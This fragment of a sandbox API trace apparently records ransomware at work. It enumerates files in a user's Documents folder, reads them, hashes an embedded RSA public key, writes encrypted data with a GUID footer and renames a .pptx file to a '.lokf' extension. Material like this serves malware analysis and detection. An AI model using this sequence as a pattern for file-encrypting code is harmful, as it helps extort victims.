dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.322] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d10 | out: hHeap=0x660000) returned 1 [0060.322] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d10 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x3294cf8 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d10 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a370 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294cf8 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d40 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cf8 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ce0 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c890a0 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.324] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x531, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb14*=0x531, lpOverlapped=0x0) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.324] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x536, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.324] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.324] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.324] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.325] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.325] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.325] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.325] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.325] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.325] CloseHandle (hObject=0x5cc) returned 1 [0060.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.326] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.326] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Pzfb-2YEs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\pzfb-2yes.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Pzfb-2YEs.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\pzfb-2yes.pptx.lokf")) returned 1 [0060.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.326] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.326] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.327] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63ab6300, ftCreationTime.dwHighDateTime=0x1d4c975, ftLastAccessTime.dwLowDateTime=0xbeee8da0, ftLastAccessTime.dwHighDateTime=0x1d4c682, ftLastWriteTime.dwLowDateTime=0xbeee8da0, ftLastWriteTime.dwHighDateTime=0x1d4c682, nFileSizeHigh=0x0, nFileSizeLow=0xe224, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q4CVm42sPsNlTUJg5b.csv", cAlternateFileName="Q4CVM4~1.CSV")) returned 1 [0060.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.328] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q4CVm42sPsNlTUJg5b.csv") returned=".csv" [0060.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q4CVm42sPsNlTUJg5b.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\q4cvm42spsnltujg5b.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.328] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=57892) returned 1 [0060.328] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.330] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe1fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.330] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.331] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.331] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.331] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xe224, lpOverlapped=0x0) returned 1 [0060.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.331] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.331] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.332] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.332] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.332] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.332] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.332] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.332] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.332] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.332] GetLastError () returned 0x0 [0060.332] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.332] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.333] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.333] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.333] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xe220) returned 0x9c8bae8 [0060.333] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c890a0 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ce0 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c890e8 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cf8 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d28 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d40 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.333] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.333] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.333] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d40 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d40 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85d28 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d40 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.334] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.334] GetCurrentThreadId () returned 0x9e0 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a5b0 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.334] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.335] GetCurrentThreadId () returned 0x9e0 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d28 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d40 [0060.335] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d10 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) 